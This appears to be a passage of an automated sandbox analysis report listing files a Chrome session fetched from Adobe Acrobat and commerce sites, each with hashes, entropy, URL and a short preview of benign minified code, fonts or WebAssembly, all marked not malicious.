                  Preview:/*! normalize.css v7.0.0 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,footer,header,nav,section{display:block}h1{font-size:2em;margin:.67em 0}figcaption,figure,main{display:block}figure{margin:1em 40px}hr{box-sizing:content-box;height:0;overflow:visible}pre{font-family:monospace,monospace;font-size:1em}a{background-color:transparent;-webkit-text-decoration-skip:objects}abbr[title]{border-bottom:none;text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted}b,strong{font-weight:inherit;font-weight:bolder}code,kbd,samp{font-family:monospace,monospace;font-size:1em}dfn{font-style:italic}mark{background-color:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (65531), with no line terminators
                  Category:downloaded
                  Size (bytes):310364
                  Entropy (8bit):5.483992703843486
                  Encrypted:false
                  SSDEEP:
                  MD5:B5EBAA34105E27D6A6258CC1BE87C614
                  SHA1:FE8CE558958E6A15D822FF1E41855A16DE4585A6
                  SHA-256:E6F1DBD0CF15A3A8255C6719349F79A1480A3E61CCE23180FC6926C0600C6A9B
                  SHA-512:38DE59931A8AA0CEBAF9F9B3CE56C517B50C6FCCF0BB9048BCB806D939671FDD378DA3D724E113AA4BA42A69EEF09B5BE812B750BC70309589002793230E78DA
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1115.1/RHComments-expandedPanelContainer-commentDialogContainer-chunk.js
                  Preview:(self["webpackJsonp-comments"]=self["webpackJsonp-comments"]||[]).push([[7381],{SpxO:(e,t,n)=>{e.exports=n("fIZv")},fIZv:(e,t,n)=>{"use strict";var i=n("AAps");t.default=Rule;var s=i(n("z3HK")),a=i(n("jp00")),l=i(n("PZ3W")),c=i(n("e1tA")),m=i(n("/hLX")),d=i(n("YWiy"));function Rule(e){var t=e.className,n=e.variant,i=void 0===n?"large":n,m=(0,a.default)(e,["className","variant"]);return d.default.createElement("hr",(0,s.default)({},(0,c.default)(m),{className:(0,l.default)("spectrum-Rule","spectrum-Rule--".concat(i),t)}))}n("me+h"),n("Vu1c"),n("JAUc"),Rule.propTypes={variant:m.default.oneOf(["large","medium","small"])}},f2ee:(e,t,n)=>{"use strict";n.d(t,{Fm:()=>l,Jd:()=>s,_f:()=>c,il:()=>i,wn:()=>a});const i=38,s=40,a=9,l=13,c=27},DM6e:(e,t,n)=>{"use strict";n.d(t,{Ax:()=>isCurrentDeviceTablet,CN:()=>isTouchDevice,cX:()=>isMac,sq:()=>isCurrentDeviceMobile,uF:()=>isWindows,un:()=>isIOS});var i=n("klCL"),s=n.n(i);window.devicePixelRatio;const a="mobile",getDeviceInfo=()=>(new(s())).getDev
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (20059)
                  Category:downloaded
                  Size (bytes):20106
                  Entropy (8bit):5.419446001452301
                  Encrypted:false
                  SSDEEP:
                  MD5:AC3F69A639C9E83A41C81A6D87DAC246
                  SHA1:FDE6AE0C87751AD091238B38E1C086105711B7DB
                  SHA-256:F89EF38011C0BFE646388A0A1E1EA8FB1FB44DE3E7B608C47A9B9B7DBE49CFEB
                  SHA-512:E171AABFFCD2C39B64BBD1AC6833EAEAC33C6D1ED6311379C35685993B03DAEDB301A684FC22800087A128F850197BC758CE594EE77501B12EEDCDD4A014D943
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1122.0/1824-chunk.js
                  Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[1824],{YgZo:(t,e,r)=>{t.exports=r("EtOT")},af1i:(t,e,r)=>{"use strict";r.d(e,{A:()=>T});var s,o=r("YWiy"),n=r("/hLX"),i=r.n(n),a=r("Avuh"),l=r.n(a),p=r("PZ3W"),u=r.n(p),c=r("Iacv"),d=r.n(c),h=r("zFJ/"),g=r.n(h),b=r("Zm2D"),v=r("DM6e"),m=r("/y6s"),_=r("plsW");const C={MOBILE_SMALL:"(max-width: 294px)",MOBILE:"(min-width: 295px) and (max-width: 767px)",TABLET:"(min-width: 768px) and (max-width: 1279px)",DESKTOP:"(min-width: 1280px) and (max-width: 1767px)",LARGE_DESKTOP:"(min-width: 1768px)"},A=Object.freeze({DEVICE_WIDTH:"DEVICE_WIDTH",FORCED_COLORS:"FORCED_COLORS",ALL:"ALL"});class MediaQueryProvider{constructor(){var t=this;this.ready=()=>Promise.resolve(this),this.getBreakpoint=function(){let e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:A.DEVICE_WIDTH;return t.__getMatchedMediaQuery(e)},this.addChangeListener=function(e){let r=arguments.length>1&&void 0!==arguments[1]?arguments[1]:A.DEVICE_WIDTH;t.listener
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (8444)
                  Category:downloaded
                  Size (bytes):8519
                  Entropy (8bit):5.279055367689211
                  Encrypted:false
                  SSDEEP:
                  MD5:08C61791C0FEF03F5A0F1A2C4513D90A
                  SHA1:1F6BBD7FC7197957115AF5DC1C5CF727E3E74202
                  SHA-256:0DBDD7352999AAA8A43E6D114E75E48F7E79EA488CA839226C7F77F89B187559
                  SHA-512:41D31A4795FC915CA4A19FAB646AEA7AFCBF72DBDEDDB6EF3710161379942D82718884410FC6F321B54867D4E1715D5C3DFB96584C94FAD1DE2038E2867C5BFF
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/home/34df8e8885/pwaProvider-06b4372d22eafdc0f275.js
                  Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new e.Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="a65a750e-4235-447a-a639-32abefec0094",e._sentryDebugIdIdentifier="sentry-dbid-a65a750e-4235-447a-a639-32abefec0094")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"34df8e88851d3cbee2b7be2637531e04f753d64c"},(self["webpackJsonp-dc-web-app"]=self["webpackJsonp-dc-web-app"]||[]).push([[622],{sLQj:(e,t,i)=>{"use strict";i.r(t),i.d(t,{default:()=>d});var r=i("k+8A"),o=i.n(r),s=i("plsW");const n="web-app";function ownKeys(e,t){var i=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),i.push.apply(i,r)}return i}function _objectSpread(e){for(var t=1;t<arguments.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):202
                  Entropy (8bit):4.638602966833698
                  Encrypted:false
                  SSDEEP:
                  MD5:CDD7A3CA40E28A36C01C6BF42E761142
                  SHA1:A383642CC2DAFDD8CAE84576AEBEB71BA318E049
                  SHA-256:39A3E129FE972509880189EB29DB5BBF8C5DF9A2A9D9E39096DFC1EE2664FEF3
                  SHA-512:047D0CEA1842690126D7FA1C5C5F637744CBE5CD51AFB47FC10891B45AA8D36C72CDB618B4A424E4A94EF4A783417402B815D8A4A5962779DF9D5DA229AFFC9D
                  Malicious:false
                  Reputation:unknown
                  Preview:{"error":{"code":"UnsupportedMimeType","message":"This end point only allows an accept header of application/vnd.adobe.skybox+json or application/vnd.adobe.dex+json with an appropriate version number"}}
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format (Version 2), CFF, length 141512, version 1.0
                  Category:downloaded
                  Size (bytes):141512
                  Entropy (8bit):7.996223405384264
                  Encrypted:true
                  SSDEEP:
                  MD5:0D922DCD8EBF13EABD04C1695D951D0E
                  SHA1:06F4D80FB2D6F3D32C8C29F2783347451D02C2CB
                  SHA-256:7FBE47EAD9F9832C2E8F1A7CDB6277EADD61B3CDDF203745933D2CADF021C922
                  SHA-512:C259981EF3149D34F6CA0F74FB08674222057175FD74EBA520D3B5A5BFBCC249786EB7A3C6A25A9D6988A7B7ACD44373660DD004CAEA3BF77FBA7D5030BDEDC5
                  Malicious:false
                  Reputation:unknown
                  URL:https://use.typekit.net/af/cb695f/000000000000000000017701/27/l?subset_id=1&fvd=n4&v=3
                  Preview:wOF2OTTO..(...........(e.........................F...y?DYNA.i?GDYN.1...:..|.`..0...6.$..4...... [y....k..`...;....P......9i.!.............CU................._.._........?..?..............................Xmv....x}~.DS%..C............S."..I1B<...t.........8.4..u..l.;.D...w.w..#.A..w$.r.Q.m.=:EVl........_.HCx.kp'uP....%.b..6..:.[Mu.....4...]{.g..v.v)b. .P..@..X.. 1,z+.r...L.h0-.1,..(._...^..O.wF...t^.{..=.vv..9=*....*.$..X(.;..wv.@.$@...%.U....K....O....)S.}.S......w....|....I..........R........} .2`....0.=./.nR.....t.k..[a.*'.AE...........I^...7. 7i.^./..Dv_....N..Qu.?...8...u..M.l.&ct7=..~.(*......;.3...."....."(..(..).Q......&w?.......?...UKz.n.r-.....EE..p........".X..........(*J...............2...RJ.E4b6b$/..y.666J.....'v..O^.u.v._.yZ.o.V.;ti.ne...!.A.."...x....l(.. .....i..b..N.....O2.....do..3..U..B..Sb%H.&..gR..bFO.'B..?.?..{B..2.......~..s..%-.)...0.,.`.<....0{...=....D0.E.U..L..._.B......Q.eoa..0.C$....DXC.V...1Y..B%.5.fw.`.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (12231)
                  Category:downloaded
                  Size (bytes):12271
                  Entropy (8bit):5.420731278627347
                  Encrypted:false
                  SSDEEP:
                  MD5:7799CF67CFD2292EE014D7B1E29533FE
                  SHA1:801EA7A2D903B05CA3D782FC9BC62B5E8A7BB0BB
                  SHA-256:72A3255860FAC13836EFA42355CD40AFCDD05D28E5103E7B776F02A09B0DDF0E
                  SHA-512:9320F3F6A5D56C5CCDBFD7B0233F5D1120A9D672CABC00A327D74A063706A003AEAA00F5F0A78871F4E9649BB594E24AFCAF35B5DD377EC3F4184E7BD5F6812D
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-web-app-dropin/3.71.0_2.210.0/732.js
                  Preview:(self["webpackJsonp-web-app"]=self["webpackJsonp-web-app"]||[]).push([[732,619],{d1dY:(t,e,i)=>{"use strict";i.r(e),i.d(e,{KNOWN_STATUS:()=>o,default:()=>n});var s=i("plsW");const o={LOCK_SCHEDULED:"LOCK_SCHEDULED",LOCKED:"LOCKED",DEFERRED:"DEFERRED",ABORTED:"ABORTED",COMPLETED:"COMPLETED"},r=s.logging.getLogger("AcpMigrationApi");class AcpMigrationApi{constructor(){var t=this;this.dcApiListener=function(e,i){let s=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{};const{headers:o={}}=s;if(o["x-acp-migration-info"]){const e=o["x-acp-migration-info"],i=t.parseMigrationHeader(e);t.currentMigrationInfo=i,t.notifyListeners(i)}},this.dcApiErrorListener=(t,e,i)=>{if(423===i.code||403===i.code){var s,o;const t=null===(s=i.details)||void 0===s||null===(o=s.headers)||void 0===o?void 0:o["x-acp-migration-info"];if(t){const e=this.parseMigrationHeader(t);this.currentMigrationInfo=e,this.notifyListeners(e)}}},this.notificationListener=()=>{s.providers["get-unc-obj"]().then((t=>{t.RegisterOb
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:WebAssembly (wasm) binary module version 0x1 (MVP)
                  Category:dropped
                  Size (bytes):1757317
                  Entropy (8bit):5.837948791542105
                  Encrypted:false
                  SSDEEP:
                  MD5:ADEB6D11685B5F33482C73653FABB8AE
                  SHA1:A874C8964C386B1EA37B1CFAC8F9065FBA37C306
                  SHA-256:8662E611EB16E565C4D6D6C52E74E0F0DD0B47A00D9052CD2136AE49262D37D7
                  SHA-512:A9913CE954B59A37132C040B4459D6D6C7654714C7F23A94F6CC4FAC99BDD3B273C9F84DC32AC6F3BC1034CFC968D18E7302F5F1B47F597528DE910DC42909B0
                  Malicious:false
                  Reputation:unknown
                  Preview:.asm.......U`...`....`....`.....`.....`......`......`.......`.......`........`.........`........`..`..~.`..........`...........`.........`..........`...`...~`..}..`...}`..}.`...~...`..}}..`...........`............`...}..`..}...`.}...`...~.`.....~..`..}}}}..`....~..`...}..`..~..`...}.`....}.`..~...`...~..`..~..~`..~.~`.....~`.....~~..`......~~..`.....|..`.............`.....}.`..}...`..}..`..|..`.~..`...~....`.....}}......`..}}.`..~`.}.}`..}}}}}}..`...}}..`.............`..|.`..............`.....~......`.....|......`...}}......`..~~..`...|..`.~~.~`....~....`...}}}...`....}`....~.~`.}}.}`..}}}.`......}}....`....||.....`..............}....`....}}..`.........................`...}.}`...|.|`..|`.}..`..}}..`..|...........R.primary._ZSt9terminatev...primary.free...primary.%wasm_acrobat_we.wasm.origa...primary.%wasm_acrobat_we.wasm.origb...primary.%wasm_acrobat_we.wasm.origc...primary.%wasm_acrobat_we.wasm.origd.6.primary.%wasm_acrobat_we.wasm.orige.E.primary.%wasm_acrobat_we.wasm.origf...primary
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (1748), with no line terminators
                  Category:downloaded
                  Size (bytes):1748
                  Entropy (8bit):5.558973742457632
                  Encrypted:false
                  SSDEEP:
                  MD5:80EEE7D9683C7D66DCC2AEF3B0C80582
                  SHA1:77EFAC84F1EDB868FEDF9275D339FA1E31991407
                  SHA-256:98DF52F10B6E39FDE935C9974C7AF0EAFB322785D41F57E052F9D221D20EBD23
                  SHA-512:8888F6A3D8167A55A5254C8BB0FD107EEAF02D64F2A9EFB62DE866D5A54DC5C26BB5AEFDF14A0084429EF2A60EE9D8C6D430C36FD4DA2B97F75DDCC38B82452B
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/store/_next/static/chunks/pages/iframe/preload-370a56d6b50eb1c7.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[489],{393225:function(e,t,r){"use strict";r.r(t);var n=r(750029),a=r(487794),c=r.n(a),o=r(893442),i=r.n(o),s=r(776293),p=r(990174),u=r(160663),l=r(712286),f=r(217579),h=r(667294),d=r(281245),_=r(148367),E=r(722584),m=r(11172),N=r(785893),w=["analytics","unified_paywall"],x=["cc_express","doc_cloud_app","firefly","photoshop_web"],O={local:"https://localhost.adobe.com",stage:"https://commerce-stg.adobe.com",production:"https://commerce.adobe.com"},P=function(){var e=(0,l.f)(),t=(0,E.kF)(),r=(0,m.oR)().getState(),n=I(t),a=(0,d.vl)(r),c=a[i().app.CLIENT_ID.name]&&x.includes(a[i().app.CLIENT_ID.name]);return(0,h.useEffect)((function(){e.get(u.e.PRELOAD_COOKIE)||e.set(u.e.PRELOAD_COOKIE,1,f.h.PERFORMANCE,{path:p.APP_FULL_PATH,maxAge:43200,secure:!0,sameSite:"None"}),s.Z.prefetch(_.Z.SEGMENTATION),s.Z.prefetch(_.Z.COMMITMENT),s.Z.prefetch(_.Z.EMAIL),s.Z.prefetch(_.Z.PAYMENT)}),[]),(0,N.jsxs)(N.Fragment,{children:[(0,N.jsxs)("div",{child
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (53480)
                  Category:downloaded
                  Size (bytes):53549
                  Entropy (8bit):5.758421531283751
                  Encrypted:false
                  SSDEEP:
                  MD5:98489A270CD983FEAB1E6BEDBAB8BB81
                  SHA1:47A90C5EC6450283960277453F27721C2430CD92
                  SHA-256:24F6A33FA92DE2985EDC1B18B414F56DFD9AF825BEAF8FF51726ED37F4C8D116
                  SHA-512:E261FC6CA813CC85BAED19D39D443CB6CCFB23F94F1AECE2F6B2F10B862C80EFFD80F8B4AB2A7FADD7B5BA9B35C7C4F4379A1E14658E6223B3F41A29D0ACFBA0
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1115.1/RHComments-commentingVerbs-chunk.js
                  Preview:(self["webpackJsonp-comments"]=self["webpackJsonp-comments"]||[]).push([[8669,907],{DxmC:(e,o,t)=>{"use strict";var n=t("YWiy");e.exports=n.createElement("svg",{viewBox:"0 0 36 36"},n.createElement("path",{d:"M13.5 18a.5.5 0 0 1 .5.5v3a.5.5 0 0 1-.5.5h-1a.5.5 0 0 1-.5-.5V20H8v10h1.5a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-5a.5.5 0 0 1-.5-.5v-1a.5.5 0 0 1 .5-.5H6V20H2v1.5a.5.5 0 0 1-.5.5h-1a.5.5 0 0 1-.5-.5v-3a.5.5 0 0 1 .5-.5z"}),n.createElement("path",{d:"M9 4a1 1 0 0 0-1 1v6a1 1 0 0 0 1 1h2a1 1 0 0 0 1-1V8h8v20h-3a1 1 0 0 0-1 1v2a1 1 0 0 0 1 1h10a1 1 0 0 0 1-1v-2a1 1 0 0 0-1-1h-3V8h8v3a1 1 0 0 0 1 1h2a1 1 0 0 0 1-1V5a1 1 0 0 0-1-1z"}))},x5nD:(e,o,t)=>{"use strict";var n=t("YWiy");e.exports=n.createElement("svg",{viewBox:"0 0 48 48"},n.createElement("path",{d:"M46 4H18a2 2 0 0 0-2 2v7a1 1 0 0 0 1 1h2a1 1 0 0 0 1-1V8h8v30h-3a1 1 0 0 0-1 1v2a1 1 0 0 0 1 1h14a1 1 0 0 0 1-1v-2a1 1 0 0 0-1-1h-3V8h8v5a1 1 0 0 0 1 1h2a1 1 0 0 0 1-1V6a2 2 0 0 0-2-2z"}),n.createElement("path",{d:"M19 18a1 1 0 0 1 1
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (4014), with no line terminators
                  Category:downloaded
                  Size (bytes):4014
                  Entropy (8bit):5.138658100937549
                  Encrypted:false
                  SSDEEP:
                  MD5:CBBC2FA7AF24AB598644B40629335E5C
                  SHA1:23C2B7CAB5579A47716C7BE39F8ECF18DA5F477E
                  SHA-256:A9FC9E7C44E4A1FAD53CD6E861F286F6180D37026466913D1ACB3807726C4187
                  SHA-512:8AE13DC61196CD13FC0B219A6F7A5EEE59301FC65E017B0134A5EC2FF8E34E19056ED851FA7859F2F0DBEE8C74456A06BC0EF2A3A0EBF8A373407F4937C1B8FF
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/mini-apps/_next/static/NFyq2_IiLM-i_2GSsWdQF/_buildManifest.js
                  Preview:self.__BUILD_MANIFEST=function(a,c,s,e,t,n,d,i,f,h,u,r,b,k,l,p,o,j,g,m,_,w,y,v){return{__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/_error":["static/chunks/pages/_error-cd3a4dcc303cc09fa80f.js"],"/academic-verification":[n,a,c,s,e,u,r,"static/chunks/5242-0ee2ebf96d7a273ebd27.js","static/chunks/pages/academic-verification.ad67eeee.css","static/chunks/pages/academic-verification-a47373b138cd42562c24.js"],"/add-product":[n,f,"static/chunks/efe3cd49-9ec6a1c86af94bd9d2a5.js",a,c,s,e,t,d,i,h,u,b,k,r,l,o,j,m,_,w,"static/chunks/9438-d56e94ed35f352ed580a.js","static/chunks/pages/add-product.e6237b99.css","static/chunks/pages/add-product-076ade8e6421bb0e711f.js"],"/aem-validator":[a,c,"static/chunks/pages/aem-validator.32c73a60.css","static/chunks/pages/aem-validator-326e8684ef53dac2b0cd.js"],"/aep":[j,"static/chunks/pages/aep-2c49cfc513f325f8a758.js"],"/analytics":["static/chunks/pages/analytics-a48341cfa418a0ea1471.js"],"/auth-message-handler":["static/chunks/pages/auth-message-hand
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PNG image data, 31 x 66, 8-bit/color RGB, non-interlaced
                  Category:downloaded
                  Size (bytes):61
                  Entropy (8bit):4.002585360278503
                  Encrypted:false
                  SSDEEP:
                  MD5:6FB005C14F3BC012374422753E621179
                  SHA1:E4713D94749E591E87F3314C1CA68A2C64849025
                  SHA-256:CA851E26FF733D38EC57A66B39F0EC3BC41885A36ABACA0FD32E97E983D51319
                  SHA-512:17210BEEFA43775D6E47E7C2F23190476140F65C206EB4EF79E07D385F57A47FC2E6816DC5D18BBB167B986B62EBF7E919CE244DD6A932A4E702BA861EA78C9E
                  Malicious:false
                  Reputation:unknown
                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/92664fb0092ec42c/1742988578563/5v1thc9AABkMxwU
                  Preview:.PNG........IHDR.......B..... .G....IDAT.....$.....IEND.B`.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (5906)
                  Category:downloaded
                  Size (bytes):5954
                  Entropy (8bit):4.655259177387779
                  Encrypted:false
                  SSDEEP:
                  MD5:7F138CE1679B288CBF0DA64964D26EA7
                  SHA1:BFFCF2F654E8C728A5AC472522E79964B63C4FDD
                  SHA-256:0F10B2C3E61121B99A186D14F9503C153B265C05191B5A57A616BED8FAFF1BAE
                  SHA-512:88008BAB2E7952866C58AE5B2AD344C48EE048B07C2FCAEE1DB9AA18C01D5D72EE247B5AE060CD9E9C131EE46FBA47F86434F27A07DC90D94FF78404E48C860E
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-pdfverbs-web/3.60.0_4.1247.0/18-18-icons.js
                  Preview:(self["webpackJsonp-pdfverbs-web"]=self["webpackJsonp-pdfverbs-web"]||[]).push([[7070],{ZutN:(e,a,l)=>{var t=l("YWiy");function SDCCompressPdf18N(e){return t.createElement("svg",e,t.createElement("g",null,[t.createElement("path",{d:"M3.49916,5.01609V2.24652A.74286.74286,0,0,1,4.21946,1.5h7.2811a.51334.51334,0,0,1,.33575.13915L14.35639,4.1947a.50157.50157,0,0,1,.14445.35546v.45946a4.44135,4.44135,0,0,1,1.47451-.71946,1.972,1.972,0,0,0-.55315-1.15109L12.90212.58347A1.98609,1.98609,0,0,0,11.50251,0H4.20877A2.248,2.248,0,0,0,2,2.24994V4.285A4.44161,4.44161,0,0,1,3.49916,5.01609Z",fill:"var(--iconFill, #464646)",key:0}),t.createElement("path",{d:"M14.50083,12.20058V14.7535a.743.743,0,0,1-.72127.74656H4.23021a.74557.74557,0,0,1-.731-.75V12.19416A4.442,4.442,0,0,1,2,12.92528v1.82136A2.2508,2.2508,0,0,0,4.21946,17H13.7903A2.24882,2.24882,0,0,0,16,14.75006V12.92761A4.44221,4.44221,0,0,1,14.50083,12.20058Z",fill:"var(--iconFill, #464646)",key:1}),t.createElement("path",{d:"M.97247,11.08558.627,1
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:WebAssembly (wasm) binary module version 0x1 (MVP)
                  Category:downloaded
                  Size (bytes):1048576
                  Entropy (8bit):7.190570154551791
                  Encrypted:false
                  SSDEEP:
                  MD5:0512C2E638298F3451692092F5720ECA
                  SHA1:3C538797BC5C2254C0C75843750D6E2251E339DB
                  SHA-256:7DBB8EEE19588A7B52E46F2557B2FE9593005025FB1C2D3B3D04BE0541EE2EA3
                  SHA-512:97A0E18DF6634789A7362F48372526EA8CD31A49BEC2BC5A4E0D97CF4608BAFDF9C8ECD28C5B0211EEBD90BAB51090A2AD139B6FA58B10F248AA1A1D9F1397A2
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-rendition-provider/AJS/build/libcld_we.d7f1adfa2ee11651dd6fea8deccb4ddf.wasm:2f8fd36ed3e862:0
                  Preview:.asm.......dylink.0...`.......`......`.....`...`....`....`..`.....`.........`......`.......`.......`...........`........`..........`................`.................9.env._ZdlPv...env.strcmp...env.fiprintf...envK_ZNSt3__212basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE9push_backEc...env.fwrite...env.memcpy...env.strchr...env.strlen...env.memset...env._Znam...env.memmove...env._ZdaPv...env._Znwm...envK_ZNSt3__212basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEPKcm...envJ_ZNSt3__212basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEPKc...env.siprintf...envI_ZNSt3__212basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEmc...env.fputs...env.__cxa_allocate_exception...env.__cxa_free_exception...env.__cxa_throw...env._ZNSt11logic_errorC2EPKc...envH_ZNKSt3__212basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE4findEcm...env.strncpy...env.memchr...env.memcmp...env._ZNSt20bad_array_new_lengthC1Ev...env.__stack_pointer....env.__memory_base....GOT.mem._ZN4CL
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (7125)
                  Category:downloaded
                  Size (bytes):7181
                  Entropy (8bit):5.353041944084759
                  Encrypted:false
                  SSDEEP:
                  MD5:F6C16056ECF6500DDD48CCE0FAC4D63A
                  SHA1:FF1AC5807EA8F05AB1AB50982F87DDFE6F02B580
                  SHA-256:1F00C7A8625D56822AC09C3E2689F52A5CD0D9904FFAD7A63F90DAB230FC2562
                  SHA-512:F4F9820D44DF232860A1FEB378FA36F7B56372292F01C543710CBF8407F8987F9238249805BDBDC7CEB7DC3B65AB72A1FFC56A2662809249B4485CDA8E37F8A4
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-files2-dropin/3.58.0_2.723.0/wp-dc-storage-chunk.js
                  Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new e.Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="3b073041-ba2b-443a-a427-b8f84282c7cb",e._sentryDebugIdIdentifier="sentry-dbid-3b073041-ba2b-443a-a427-b8f84282c7cb")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"3cf5c6bf825d9ccdf1ebf0bfd9737649fd92cc3f"},(self["webpackJsonp-files2"]=self["webpackJsonp-files2"]||[]).push([[2732],{"0lZE":(e,t,i)=>{"use strict";i.d(t,{A:()=>n});const n=["onAssetUpdated"]},ZGl3:(e,t,i)=>{"use strict";i.r(t),i.d(t,{default:()=>c});var n=i("0VNB"),s=i.n(n),o=i("plsW"),r=i("H8In"),a=i("0lZE"),__awaiter=function(e,t,i,n){return new(i||(i=Promise))((function(s,o){function fulfilled(e){try{step(n.next(e))}catch(e){o(e)}}function rejected(e){try{step(n.throw(e))}catch(e){o(e)}}function step(e){e.d
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (3986)
                  Category:downloaded
                  Size (bytes):4038
                  Entropy (8bit):5.368998923602788
                  Encrypted:false
                  SSDEEP:
                  MD5:120EC6BEDFDD45BB2C972FFFB1A7D624
                  SHA1:E172565CFA54F01B5520C3BE51F8A9B6993FEAE2
                  SHA-256:786907AF1C74E681AECADEF00769EFF7D97F4B7244AAD368F787BD27809392E0
                  SHA-512:862C35AB9BBD06B5160859E82486ED392ADA8369F0E40A984912E3EB476C61FF6439DB5A1B2795C99CD9FE981BBB1AFE002276D4618F96F860B30EA99D2B590C
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-ccverbs-dropin/3.17.1_2.303.0/express-tooltip.js
                  Preview:(self["webpackJsonp-ccverbs-dropin"]=self["webpackJsonp-ccverbs-dropin"]||[]).push([[9848],{lsGk:(t,e,o)=>{"use strict";o.r(e),o.d(e,{default:()=>x});var s=o("YWiy"),a=o("/hLX"),i=o.n(a),p=o("0rPo"),l=o("GWyE"),r=o("PZ3W"),n=o.n(r),c=o("WUm0"),d=o("qpd/"),_=o.n(d);const m=o.e(9848).then(o.bind(o,"SdJc")).then((t=>t.default)),ExpressTooltip=t=>{const{title:e,image:o,animation:a,children:i,useDefaultAnimation:r,logo:d}=t,[x,u]=(0,s.useState)(!0),[g,f]=(0,s.useState)(a),h=n()("spectrum-CoachMarkPopover",_().tooltipContent),T=n()("spectrum-CoachMarkPopover-header",_().tooltipHeader),E=n()("spectrum-CoachMarkPopover-content",{[_().tooltipText]:e,[_().tooltipTextNoTitle]:!e});return(0,s.useEffect)((()=>{if(r){(async()=>{const t=await m;f(t)})()}}),[r]),(0,s.useEffect)((()=>{(async()=>{const t=await(0,c.D1)();u(!t)})()}),[]),x&&s.createElement("div",{className:h,"data-test-id":"express-tooltip-container"},o&&s.createElement("img",{alt:e,className:"spectrum-CoachMarkPopover-image","data-test-i
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:WebAssembly (wasm) binary module version 0x1 (MVP)
                  Category:dropped
                  Size (bytes):9577747
                  Entropy (8bit):5.7905918751488645
                  Encrypted:false
                  SSDEEP:
                  MD5:F8659BF25DAA21F0FA4042E25308EEF6
                  SHA1:6CEA69BC854A52178A665906383E6B4E9BD2AF0C
                  SHA-256:69AA19005687FF3505F5A2FCAC6A5FB7B5F3081108DF4D4FFB162E3FC2BFEEA6
                  SHA-512:65CB7D00A9D2373864F968E408B4FD3013AFFB79CDFB303426088630492D6770286C27DBD717A0ED11641872CFF8D3E18A98887412C46E85FF031ADA993202EA
                  Malicious:false
                  Reputation:unknown
